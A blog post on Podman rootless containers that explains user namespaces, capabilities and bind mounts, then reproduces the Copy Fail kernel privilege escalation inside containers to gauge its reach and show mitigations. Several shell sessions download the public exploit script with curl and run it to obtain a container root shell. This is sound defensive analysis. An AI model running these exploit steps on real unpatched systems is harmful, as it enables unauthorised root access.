Podman rootless containers and the Copy Fail exploit

Source: garrido.io

On April 29th CVE-2026-31431 was publicly disclosed at https://copy.fail/. This vulnerability allows a local unprivileged user to obtain a root shell by running the Python script shared by the author.

This exploit can be used against Linux containers, which are widely used to run all sorts of things: public-facing services, development environments, continuous integration jobs, etc. A container exploited with Copy Fail can be used quite effectively for many kinds of attacks.


This CVE is quite interesting to me as it’s been about a year since I moved away from Docker to Podman to run containers. Several reasons motivated this change, but chief among them was Podman’s security posture.

Podman makes it trivial to run containers as an unprivileged user, and this is known as running a container “rootless”. Unlike Docker, Podman uses a fork/exec model such that the container process is ultimately a descendant of the podman run process that is used to run the container. As a result, you can rely on standard UID separation to isolate your container processes from root or other users in the system.

As I read about Copy Fail I did not find much information about its use in rootless containers specifically. After performing some simple tests I confirmed that Copy Fail is indeed exploitable in rootless containers to obtain a container root shell, but the blast radius is severely limited by several features in Podman.

At the time of publishing, there is not a lot of information about container escapes:

Root cause, scatterlist diagrams, the 2011 → 2015 → 2017 history, and the exploit walkthrough are on the Xint blog. Part 2 (Kubernetes container escape) is forthcoming.

In my testing, the container root is still limited to what the unprivileged user running the container can do at the host level.

All in all, Copy Fail has proven to be a great example to refer to when writing about Podman’s implementation of rootless containers. In this note I reproduce the exploit across distinct container configurations to try to understand the exposure of a compromised rootless container.

This article ended up being a bit long so feel free to jump ahead to the relevant parts if you need to:

  1. A practical review of rootless containers, user namespaces and Linux capabilities
  2. Using Copy Fail in rootless containers
  3. Practicing defence in depth to further limit exposure in the event of a compromise

An overview of rootless containers

Let’s assume that I need to run an HTTP server to serve some HTML. The server will run in a container owned by an unprivileged user bar whose UID is 1001.

I install Podman, create the user bar, and switch to it. Then, I build the image using podman build and run the container using podman run:

root@debian:~# apt install -y podman
root@debian:~# useradd -m -d /var/lib/bar -s /bin/bash -u 1001 bar
root@debian:~# su - bar
bar@debian:~$ cat > Containerfile <<EOF
FROM ubuntu:latest

RUN apt update && apt install -y python3 && apt clean

RUN mkdir -p /var/www/html
WORKDIR /var/www/html

RUN cat > index.html <<HTML
<!DOCTYPE html><html lang="en"></html>
HTML

EXPOSE 8000
CMD ["python3", "-m", "http.server", "-b", "0.0.0.0", "8000"]
EOF
bar@debian:~$ podman build -t http-server .
bar@debian:~$ podman run --rm -it --name http-server-1 -d -p 127.0.0.1:8000:8000/tcp localhost/http-server:latest

The server should now be responding to requests:

bar@debian:~$ curl localhost:8000
<!DOCTYPE html><html lang="en"></html>

Rootless rootful

Let’s examine what this container process looks like. Using ps I can confirm that this python3 process is owned by the user bar:

root@debian:~# ps -fC python3
UID          PID    PPID  C STIME TTY          TIME CMD
bar         4861    4859  0 19:26 pts/0    00:00:00 python3 -m http.server -b 0.0.0.0 8000

As mentioned in the introduction, Podman uses a fork/exec model to run containers. User bar executed the podman run command, and the container command python3 descended from that process. This is in contrast to the standard Docker setup, in which running docker run as an unprivileged user executes a Docker client that interacts with a rootful daemon that ultimately spawns the container:

bar@debian:~$ docker run --rm -it -d --name http-server-1 http-server
bar@debian:~$ ps -fC python3
UID          PID    PPID  C STIME TTY          TIME CMD
root        5198    5175  5 19:20 pts/0    00:00:00 python3 -m http.server -b 0.0.0.0 8000
bar@debian:~$ docker container top http-server-1
UID                 PID                 PPID                C                   STIME               TTY                 TIME                CMD
root                4844                4820                0                   14:51               pts/0               00:00:00            python3 -m http.server -b 0.0.0.0 8000
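
The fork/exec relationship described above can be illustrated outside of Podman. This is only a minimal sketch of the general UNIX behaviour, not of Podman's internals: a child process spawned through fork/exec inherits the UID of its parent unless something privileged changes it. The helper name child_uid is mine.

```python
import os
import subprocess
import sys


def child_uid() -> int:
    """Spawn a child process (fork/exec) and return the UID it runs as."""
    result = subprocess.run(
        [sys.executable, "-c", "import os; print(os.getuid())"],
        capture_output=True,
        text=True,
        check=True,
    )
    return int(result.stdout.strip())


if __name__ == "__main__":
    # The child inherits the UID of the process that spawned it.
    print("parent UID:", os.getuid())
    print("child UID: ", child_uid())
```

Run as bar, both lines would report bar's UID. With a daemon-based setup the container is not a child of the client at all, which is why ps reports root in the Docker example.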

Now, containers also have users and groups to determine permissions inside the container. Most images default to running the container commands as root in the absence of an explicit USER instruction in the Containerfile or a --user flag when running the container.

Using podman top I can confirm that the python3 container process is running as root as I did not declare which user executes the process:

bar@debian:~$ podman top http-server-1 huser,user,pid,args
HUSER       USER        PID         COMMAND
1001        root        1           python3 -m http.server -b 0.0.0.0 8000 

Remember that containers share the kernel with the host. What does being root inside the container mean? Surely this is not the same as host root given that we’re using an unprivileged user?

User namespaces

Podman uses user namespaces for rootless containers. User namespaces allow processes to have a different UID/GID inside and outside the container. In our previous example, the python3 process has a UID of 0 (i.e. container root) inside the namespace while being mapped to UID 1001 (i.e. host bar) outside it.

The range of UIDs that can be allocated to namespaced processes of user bar is determined in /etc/subuid:

bar@debian:~$ grep bar /etc/subuid
bar:165536:65536

Besides UID 1001, there are 65,536 UIDs that can be allocated to processes of bar, starting with 165536 and ending with 231071 (165536 + 65536 - 1).
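
To make the arithmetic explicit, here is a small sketch that derives the inclusive range from a single /etc/subuid entry. The entry format is name:start:count, so the last UID is start + count - 1. The function names are my own and the entry is the one shown above.

```python
def parse_subuid(line: str) -> tuple[str, int, int]:
    """Parse one /etc/subuid entry of the form name:start:count."""
    name, start, count = line.strip().split(":")
    return name, int(start), int(count)


def subuid_range(line: str) -> tuple[int, int]:
    """Return the first and last subordinate UID, both inclusive."""
    _, start, count = parse_subuid(line)
    return start, start + count - 1


if __name__ == "__main__":
    first, last = subuid_range("bar:165536:65536")
    print(first, last)  # 165536 231071
```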

Our current image is based off of ubuntu, which brings its own set of users:

bar@debian:~$ podman run --rm -it --name http-server-1 localhost/http-server:latest cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

Processes and objects from these users have the UIDs shown above within the bar user namespace. Outside the namespace these are mapped to a UID within the 165536-231071 range, with the exception of root, which is mapped to host UID 1001.

For example, let’s have bar run sleep in the container as user www-data:

bar@debian:~$ podman run --rm -it -d --name http-server-1 --user=www-data localhost/http-server:latest sleep 60
bar@debian:~$ podman top http-server-1 huser,user,args
HUSER       USER        COMMAND
165568      www-data    sleep 60 

The sleep process is running as www-data inside the user namespace but is mapped to 165568 on the host. The user namespace affords standard UID isolation across processes of the same user. That is to say, from the host’s perspective, a process of www-data in the bar user namespace is separate from one of bar.
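
The mapping can be written down as a short function. This is a sketch that assumes the default rootless layout seen in this note: container UID 0 is the user who started the container, and container UIDs from 1 upwards are taken in order from that user's /etc/subuid range. The function and parameter names are hypothetical.

```python
def host_uid(container_uid: int, owner_uid: int, sub_start: int, sub_count: int) -> int:
    """Map a UID inside a rootless user namespace to its host UID.

    Assumes container UID 0 maps to the owner, and container UIDs
    1..sub_count map onto the owner's subordinate UID range in order.
    """
    if container_uid == 0:
        return owner_uid
    if 1 <= container_uid <= sub_count:
        return sub_start + container_uid - 1
    raise ValueError(f"UID {container_uid} is not mapped in this namespace")


if __name__ == "__main__":
    # bar has UID 1001 and the subuid entry bar:165536:65536
    print(host_uid(0, 1001, 165536, 65536))   # 1001 (container root)
    print(host_uid(33, 1001, 165536, 65536))  # 165568 (www-data)
```

The second result matches the HUSER column that podman top reported for the sleep process.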

Docker does support using user namespaces, but it must be configured accordingly and only one user namespace is allowed. With Podman, each UNIX user has its rootless containers running in the corresponding user namespace.

You can use podman unshare to enter the user’s namespace without having to run a container. We can use this to understand the relationship between bar and the namespace root by comparing the ownership of bar’s home directory, both inside and outside the namespace:

bar@debian:~$ ls -ld $HOME
drwx------ 5 bar bar 4096 May  2 22:58 /var/lib/bar
bar@debian:~$ podman unshare ls -ld $HOME
drwx------ 5 root root 4096 May  2 22:58 /var/lib/bar

The last thing to understand about the container root is privileges. Per the Containerfile that we’re using, root was able to install python3 in the container using apt install. How was this possible given that installing packages involves multiple privileged operations and bar is not the host root?

Privileged operations

Podman uses Linux capabilities to grant granular root privileges to a container process. You can drop or add these capabilities both when building the image and running the container.

By using pscap we can observe that multiple capabilities are granted to the apt process that runs during the image build for user bar:

root@debian:~# pscap
ppid  pid   uid         command             capabilities
10941 11272 bar         apt *               chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, sys_chroot, setfcap +

These capabilities are set by Podman, and it is their combination that allows root in the namespace to perform privileged operations. Should we drop all capabilities during podman build using --cap-drop=all, the image will fail to build due to lack of permissions:

bar@debian:~$ podman build -t http-server --cap-drop=all --no-cache .
STEP 1/7: FROM ubuntu:latest
STEP 2/7: RUN apt update &&         apt install -y python3 &&         apt clean

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

E: setgroups 65534 failed - setgroups (1: Operation not permitted)
E: setegid 65534 failed - setegid (1: Operation not permitted)
E: seteuid 42 failed - seteuid (1: Operation not permitted)
E: setgroups 0 failed - setgroups (1: Operation not permitted)
Reading package lists...
W: chown to _apt:root of directory /var/lib/apt/lists/partial failed - SetupAPTPartialDirectory (1: Operation not permitted)
W: chown to _apt:root of directory /var/lib/apt/lists/auxfiles failed - SetupAPTPartialDirectory (1: Operation not permitted)
E: setgroups 65534 failed - setgroups (1: Operation not permitted)
E: setegid 65534 failed - setegid (1: Operation not permitted)
E: seteuid 42 failed - seteuid (1: Operation not permitted)
E: setgroups 0 failed - setgroups (1: Operation not permitted)
E: Method gave invalid 400 URI Failure message: Failed to setgroups - setgroups (1: Operation not permitted)
E: Method http has died unexpectedly!
E: Sub-process http returned an error code (112)
Error: building at STEP "RUN apt update &&         apt install -y python3 &&         apt clean": while running runtime: exit status 100

We certainly need the privileges in this case so we can either use the default set for root, or drop all capabilities and then set the ones that are necessary to install packages:

bar@debian:~$ podman build -t http-server --cap-drop=all --cap-add=CAP_SETUID,CAP_SETGID,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER --no-cache .

Knowing this, we can go back and review the capabilities granted to the python3 process behind our HTTP server:

bar@debian:~$ podman run --rm -it -d --name http-server-1 -p 127.0.0.1:8000:8000/tcp localhost/http-server:latest
bar@debian:~$ podman top http-server-1 user,capeff,args
USER        EFFECTIVE CAPS                                                                                   COMMAND
root        CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT  python3 -m http.server -b 0.0.0.0 8000 
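
Outside of podman top, the kernel exposes the same information as a hexadecimal bitmask in the CapEff field of /proc/<pid>/status. The sketch below converts between that mask and the names shown above. The bit numbers follow linux/capability.h, only the first 32 capabilities are listed, and the function names are my own.

```python
# Capability names indexed by bit number, as in linux/capability.h (bits 0-31 only).
CAP_NAMES = [
    "CHOWN", "DAC_OVERRIDE", "DAC_READ_SEARCH", "FOWNER", "FSETID", "KILL",
    "SETGID", "SETUID", "SETPCAP", "LINUX_IMMUTABLE", "NET_BIND_SERVICE",
    "NET_BROADCAST", "NET_ADMIN", "NET_RAW", "IPC_LOCK", "IPC_OWNER",
    "SYS_MODULE", "SYS_RAWIO", "SYS_CHROOT", "SYS_PTRACE", "SYS_PACCT",
    "SYS_ADMIN", "SYS_BOOT", "SYS_NICE", "SYS_RESOURCE", "SYS_TIME",
    "SYS_TTY_CONFIG", "MKNOD", "LEASE", "AUDIT_WRITE", "AUDIT_CONTROL",
    "SETFCAP",
]


def decode_caps(mask_hex: str) -> list[str]:
    """Turn a CapEff-style hex mask into a list of capability names."""
    mask = int(mask_hex, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


def encode_caps(names) -> str:
    """Turn capability names into a 16-digit hex mask."""
    mask = 0
    for name in names:
        mask |= 1 << CAP_NAMES.index(name)
    return f"{mask:016x}"


if __name__ == "__main__":
    # The effective set reported by podman top for our HTTP server.
    default_set = [
        "CHOWN", "DAC_OVERRIDE", "FOWNER", "FSETID", "KILL", "NET_BIND_SERVICE",
        "SETFCAP", "SETGID", "SETPCAP", "SETUID", "SYS_CHROOT",
    ]
    print(encode_caps(default_set))
    print(decode_caps("0000000000000000"))  # [] once every capability is dropped
```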

Our HTTP server is running as root with a lot of capabilities that it doesn’t need. That is quite the surface area to exploit in the event that the container process is compromised.

We can improve the situation by dropping all capabilities when starting the container:


bar@debian:~$ podman run --rm -it -d --name http-server-1 -p 127.0.0.1:8000:8000/tcp --cap-drop=all localhost/http-server:latest
bar@debian:~$ podman top http-server-1 user,capeff,args
USER        EFFECTIVE CAPS  COMMAND
root        none            python3 -m http.server -b 0.0.0.0 8000 

Much better! Yet, we can go further. Even without capabilities, root can still modify all the files that it owns. There is no need for our server to run under root, so let’s have an unprivileged user do it.

Rootless non-root

To run our HTTP server as an unprivileged user within the container we can either inspect the base image’s /etc/passwd file and choose an existing user (e.g. www-data), or create our own during the image build. In my case I prefer to use a dedicated foo user with UID 1002 that has read-only access to the served files:

FROM ubuntu:latest

RUN apt update && apt install -y python3 && apt clean

RUN mkdir -p /var/www/html
+ RUN groupadd -g 1002 foo
+ RUN useradd -s /bin/bash -g 1002 -u 1002 foo
+ RUN chown root:foo /var/www/html
WORKDIR /var/www/html

RUN cat > index.html <<HTML
<!DOCTYPE html><html lang="en"></html>
HTML

+ USER foo:foo
EXPOSE 8000
CMD ["python3", "-m", "http.server", "-b", "0.0.0.0", "8000"]

Once again I build and run the container. Note that I don’t need to specify the user explicitly when I run podman run because the USER foo:foo instruction in the Containerfile sets that UID for all processes thereafter.

bar@debian:~$ podman run --rm -it -d --name http-server-1 -p 127.0.0.1:8000:8000/tcp --cap-drop=all localhost/http-server:latest
bar@debian:~$ podman top http-server-1 huser,user,capeff,args
HUSER       USER        EFFECTIVE CAPS  COMMAND
166537      foo         none            python3 -m http.server -b 0.0.0.0 8000 

All good! Our server is running as user foo inside the container, mapped to UID 166537 on the host, and without any capabilities.

Container processes should run with the least amount of privileges, only adding them as necessary. For example, if we wanted to have python3 bind to privileged port 80 while running as foo, we would have to grant the NET_BIND_SERVICE capability using --cap-add=CAP_NET_BIND_SERVICE during podman run.

To conclude, there are four ways in which our container could possibly be configured to run:

Host user      Container user   Term
root           root             root rootful
root           unprivileged     root non-root
unprivileged   root             rootless rootful
unprivileged   unprivileged     rootless non-root
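
The four combinations reduce to two independent questions: is the host user root, and is the container user root? A tiny sketch, with a function name of my own choosing:

```python
def container_mode(host_uid: int, container_uid: int) -> str:
    """Name the configuration using the terms from the table above."""
    host = "root" if host_uid == 0 else "rootless"
    inside = "rootful" if container_uid == 0 else "non-root"
    return f"{host} {inside}"


if __name__ == "__main__":
    print(container_mode(1001, 0))     # rootless rootful
    print(container_mode(1001, 1002))  # rootless non-root
```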

Podman makes it trivial to run a rootless rootful container, and rather easy to run a rootless non-root container as long as you can execute the container’s process as an unprivileged user. The latter typically requires more familiarity with how the container image is built.

Bind mounts

Before moving on to Copy Fail, let’s review what we’ve seen so far with the concept of bind mounts.

We will mount a host directory into the container, and this directory will have files owned by the host root, host bar, and namespaced foo. These files will be readable only by their respective user and group, but the directory will be writable by anyone so that the container user can create its file:

root@debian:~# mkdir /var/lib/bar/test
root@debian:~# chown bar:bar /var/lib/bar/test
root@debian:~# chmod 0777 /var/lib/bar/test
root@debian:~# echo 'I am root' > /var/lib/bar/test/root.txt
root@debian:~# su - bar
bar@debian:~$ echo 'I am bar' > test/bar.txt
bar@debian:~$ exit
root@debian:~# chmod u=rw,g=r,o= /var/lib/bar/test/*.txt
root@debian:~# ls -l /var/lib/bar/test
total 8
-rw-r----- 1 bar  bar   9 May  4 14:40 bar.txt
-rw-r----- 1 root root 10 May  4 14:40 root.txt

Now, let’s mount this directory into the container, run it as foo, and try to read the contents:

bar@debian:~$ podman run --rm -it --name http-server-1 -v ./test:/test:rw localhost/http-server:latest /bin/bash
foo@d1c30d4bfe95:/var/www/html$ ls -l /test
total 8
-rw-r----- 1 root   root     9 May  4 14:40 bar.txt
-rw-r----- 1 nobody nogroup 10 May  4 14:40 root.txt
foo@d1c30d4bfe95:/var/www/html$ cat /test/*.txt
cat: /test/bar.txt: Permission denied
cat: /test/root.txt: Permission denied
foo@d1c30d4bfe95:/var/www/html$ 

As expected, the file owned by host bar is shown as owned by root. However, host root is nobody:nogroup because host root is not mapped to any user in the bar user namespace.
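
The same lookup can be sketched in the other direction, from host UID to what the namespace sees. The extents below use the three columns of /proc/<pid>/uid_map (inside start, outside start, length). They are an assumption that mirrors bar's setup in this note rather than output copied from a real system. A host UID that matches no extent is reported as the kernel's overflow UID, which defaults to 65534 (nobody).

```python
OVERFLOW_UID = 65534  # default of /proc/sys/kernel/overflowuid, shown as "nobody"

# (inside_start, outside_start, length), assumed to mirror bar's namespace.
BAR_UID_MAP = [(0, 1001, 1), (1, 165536, 65536)]


def uid_seen_inside(host_uid: int, uid_map=BAR_UID_MAP) -> int:
    """Return the UID that a host UID appears as inside the namespace."""
    for inside, outside, length in uid_map:
        if outside <= host_uid < outside + length:
            return inside + (host_uid - outside)
    return OVERFLOW_UID  # unmapped, e.g. host root


if __name__ == "__main__":
    print(uid_seen_inside(1001))  # 0, host bar appears as root
    print(uid_seen_inside(0))     # 65534, host root appears as nobody
```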

Namespaced user foo cannot read any of these mounted files. Hence, using rootless non-root provides more isolation than rootless rootful because the container process cannot access processes or files owned by bar (i.e. namespace root).

Now, let’s have foo create a file in the bind mount:

foo@a94715fe7fa9:/var/www/html$ echo 'I am foo' > /test/foo.txt
foo@a94715fe7fa9:/var/www/html$ chmod u=rw,g=r,o= /test/foo.txt
foo@a94715fe7fa9:/var/www/html$ ls -l /test
total 12
-rw-r----- 1 root   root     9 May  4 14:40 bar.txt
-rw-r----- 1 foo    foo      9 May  4 14:48 foo.txt
-rw-r----- 1 nobody nogroup 10 May  4 14:40 root.txt

Back on the host, let’s look at the directory that was mounted and try to access the file created by namespaced foo:


bar@debian:~$ ls -l test
total 12
-rw-r----- 1 bar    bar     9 May  4 14:40 bar.txt
-rw-r----- 1 166537 166537  9 May  4 14:48 foo.txt
-rw-r----- 1 root   root   10 May  4 14:40 root.txt
bar@debian:~$ cat test/foo.txt 
cat: test/foo.txt: Permission denied

As expected, the file created by foo is owned by its mapped UID and thus bar cannot read the contents of it.

What about running the container process as user root?

bar@debian:~$ podman run --rm -it --name http-server-1 --user=root -v ./test:/test:rw localhost/http-server:latest /bin/bash
root@7f99bdf6766f:/var/www/html# ls -l /test
total 12
-rw-r----- 1 root   root     9 May  4 14:40 bar.txt
-rw-r----- 1 foo    foo      9 May  4 14:48 foo.txt
-rw-r----- 1 nobody nogroup 10 May  4 14:40 root.txt
root@7f99bdf6766f:/var/www/html# cat /test/*.txt
I am bar
I am foo
cat: /test/root.txt: Permission denied

As expected, namespaced root can read its “own” file and foo’s, but not the one owned by host root. If we drop the container’s capabilities, root loses CAP_DAC_OVERRIDE and can no longer read foo’s file:

bar@debian:~$ podman run --rm -it --name http-server-1 --user=root --cap-drop=all -v ./test:/test:rw localhost/http-server:latest /bin/bash
root@dbe4cb171f13:/var/www/html# cat /test/*.txt
I am bar
cat: /test/foo.txt: Permission denied
cat: /test/root.txt: Permission denied
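
These results can be reproduced with a deliberately simplified model of the kernel's read check. It is a sketch under several assumptions: it ignores supplementary groups, ACLs and CAP_DAC_READ_SEARCH, and it treats CAP_DAC_OVERRIDE as applying only to files whose owner and group are mapped in the namespace. All names are hypothetical.

```python
def can_read(uid, gid, caps, owner, group, mode):
    """Simplified read check for a process inside a user namespace.

    owner and group are the file's IDs as seen inside the namespace,
    or None when the host ID is unmapped (shown as nobody/nogroup).
    """
    mapped = owner is not None and group is not None
    # The capability only helps for files that belong to the namespace.
    if "DAC_OVERRIDE" in caps and mapped:
        return True
    if owner is not None and uid == owner:
        return bool(mode & 0o400)  # owner read bit
    if group is not None and gid == group:
        return bool(mode & 0o040)  # group read bit
    return bool(mode & 0o004)      # everyone else


# The three files in /test, all with mode 0640.
FILES = {
    "bar.txt": (0, 0),        # host bar, seen as root inside
    "foo.txt": (1002, 1002),  # namespaced foo
    "root.txt": (None, None), # host root, unmapped
}

if __name__ == "__main__":
    for caps in ({"DAC_OVERRIDE"}, set()):
        readable = [
            name for name, (owner, group) in FILES.items()
            if can_read(0, 0, caps, owner, group, 0o640)
        ]
        print(sorted(caps), readable)
```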

Copy Fail

At this point we have a good grasp of how rootless containers rely on user namespaces and UIDs for process isolation, and Linux capabilities to perform privileged operations. Let’s see what we can achieve using Copy Fail in various rootless container configurations.

Note: I am using the version of Copy Fail that was originally published in commit 8e918b5.

We will use our existing HTTP server container to get a sense of how a container can be compromised and what mechanisms we have to limit the blast radius. But first, let’s update our previous Containerfile so that curl is installed in the container. We will use it to download the exploit.

FROM ubuntu:latest

+ RUN apt update && apt install -y python3 curl && apt clean
- RUN apt update && apt install -y python3 && apt clean

RUN mkdir -p /var/www/html
RUN groupadd -g 1002 foo
RUN useradd -s /bin/bash -g 1002 -u 1002 foo
RUN chown root:foo /var/www/html
WORKDIR /var/www/html

RUN cat > index.html <<HTML
<!DOCTYPE html><html lang="en"></html>
HTML

USER foo:foo
EXPOSE 8000
CMD ["python3", "-m", "http.server", "-b", "0.0.0.0", "8000"]

I’ll call this image copyfail:

bar@debian:~$ podman build -t copyfail .

I need to make sure that I am on a kernel that has not yet been patched. I am using Debian, so any recent version below 6.12.85 will do:

bar@debian:~$ uname -r
6.12.74+deb13+1-amd64
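
If you want to script this check, the sketch below compares the numeric part of the release string against 6.12.85. The threshold is the one mentioned above and only makes sense for Debian's 6.12 series. Other distributions and kernel branches backport fixes under different version numbers, so treat the result as a hint rather than proof. The function names are my own.

```python
import platform
import re

PATCHED = (6, 12, 85)  # threshold for Debian's 6.12 kernels, as stated in this note


def kernel_version(release: str) -> tuple[int, int, int]:
    """Extract (major, minor, patch) from a uname -r style string."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if match is None:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = (int(part) for part in match.groups())
    return major, minor, patch


def looks_unpatched(release: str) -> bool:
    """True when the release sorts below the patched version."""
    return kernel_version(release) < PATCHED


if __name__ == "__main__":
    print(looks_unpatched("6.12.74+deb13+1-amd64"))  # True
    print("running kernel:", platform.release())
```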

Copy Fail affords running su without a password prompt whatsoever, thus obtaining a root shell. Calling su as an unprivileged user will normally prompt for the root password:

bar@debian:~$ podman run --rm -it --name copyfail localhost/copyfail /bin/bash
foo@c0e7377ce040:/var/www/html$ su
Password: 

In each test, the container user will download the Copy Fail script to /tmp and then execute it. If a root shell is obtained, sleep is called. Copy Fail persists across container lifecycles, so this VM is rebooted prior to each test.

Rootless rootful

Let’s go back to running our HTTP server as a rootless rootful container, meaning, the process runs as root inside the container but as unprivileged user bar in the host.

bar@debian:~$ podman run --rm -it --name copyfail --user=root localhost/copyfail /bin/bash
root@4c4dd3eb4e84:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@4c4dd3eb4e84:/var/www/html# cd /tmp
root@4c4dd3eb4e84:/tmp# curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2554      0 --:--:-- --:--:-- --:--:--  2559
root@4c4dd3eb4e84:/tmp# python3 copy_fail_exp.py && su
# id
uid=0(root) gid=0(root) groups=0(root)
# sleep 60

What happened here is what you would normally expect if you’re the root user. root can invoke su to open another root shell, no password is necessary. Here’s the same set of commands without Copy Fail:

bar@debian:~$ podman run --rm -it --name copyfail --user=root localhost/copyfail /bin/bash
root@19f2187d5b57:/var/www/html# su
root@19f2187d5b57:/var/www/html# 

It goes without saying that Copy Fail is not contributing anything in this particular container since we were already root. Looking at our container process we can see that all of the processes are running as root inside the user namespace, though still as bar on the host. Also, the exact same set of capabilities persists across both shells:

bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
1001        root        1           /bin/bash                  CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        6           python3 copy_fail_exp.py   CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        7           sh -c -- su                CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        8           [sh]                       CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        10          sleep 60                   CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT

Lastly, root cannot read the mounted host file /test/root.txt:

# cat /test/*.txt
I am bar
I am foo
cat: /test/root.txt: Permission denied

Rootless non-root

We know better than running the container process as root, so let’s repeat the exploit using foo.

bar@debian:~$ podman run --rm -it --name copyfail -v ./test:/test:rw localhost/copyfail:latest /bin/bash
foo@ef4c1e6775bd:/var/www/html$ id
uid=1002(foo) gid=1002(foo) groups=1002(foo)
foo@ef4c1e6775bd:/var/www/html$ cd /tmp
foo@ef4c1e6775bd:/tmp$ curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2227      0 --:--:-- --:--:-- --:--:--  2231
foo@ef4c1e6775bd:/tmp$ python3 copy_fail_exp.py && su
# id
uid=0(root) gid=1002(foo) groups=1002(foo)
# sleep 60

It worked! We were able to escalate from container foo to container root. Looking at the container processes, we can confirm that sleep is running as container root and host bar, and some new capabilities were assumed:

bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
166537      foo         1           /bin/bash                  none
166537      foo         7           python3 copy_fail_exp.py   none
166537      foo         8           sh -c -- su                none
1001        root        9           [sh]                       CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        10          sleep 60                   CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT

Nonetheless, our root still cannot access the mounted host root file:

# cat /test/*.txt
I am bar
I am foo
cat: /test/root.txt: Permission denied

At this point the container has been compromised and can be leveraged for all sorts of things. We’ve limited the blast radius of the exploit to the container and whatever unprivileged user bar can do on the host.

Is there anything we can do to mitigate the exploit in the first place?

Rootless non-root while disabling new privileges

Podman allows running containers such that the container process cannot gain more privileges than the ones it began with.

All we have to do is add --security-opt=no-new-privileges to our podman run command and repeat the exploit:

bar@debian:~$ podman run --rm -it --name copyfail --security-opt=no-new-privileges -v ./test:/test:rw localhost/copyfail:latest /bin/bash
foo@3422d6ffc15a:/var/www/html$ cd /tmp
foo@3422d6ffc15a:/tmp$ curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2697      0 --:--:-- --:--:-- --:--:--  2701
foo@3422d6ffc15a:/tmp$ python3 copy_fail_exp.py && su
$ id
uid=1002(foo) gid=1002(foo) groups=1002(foo)
$ sleep 60

Interesting! We gained a shell but it is still foo. We can look at the container processes to confirm that the user is still the same one:

bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
166537      foo         1           /bin/bash                  none
166537      foo         8           python3 copy_fail_exp.py   none
166537      foo         9           sh -c -- su                none
166537      foo         10          [sh]                       none
166537      foo         12          sleep 60                   none

Once again, foo is limited to reading its own file:

$ cat /test/*.txt
cat: /test/bar.txt: Permission denied
I am foo
cat: /test/root.txt: Permission denied

This is much better. The container has been compromised but it’s still running as unprivileged user foo without any capability whatsoever. It is limited to whatever foo can do within the container.
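
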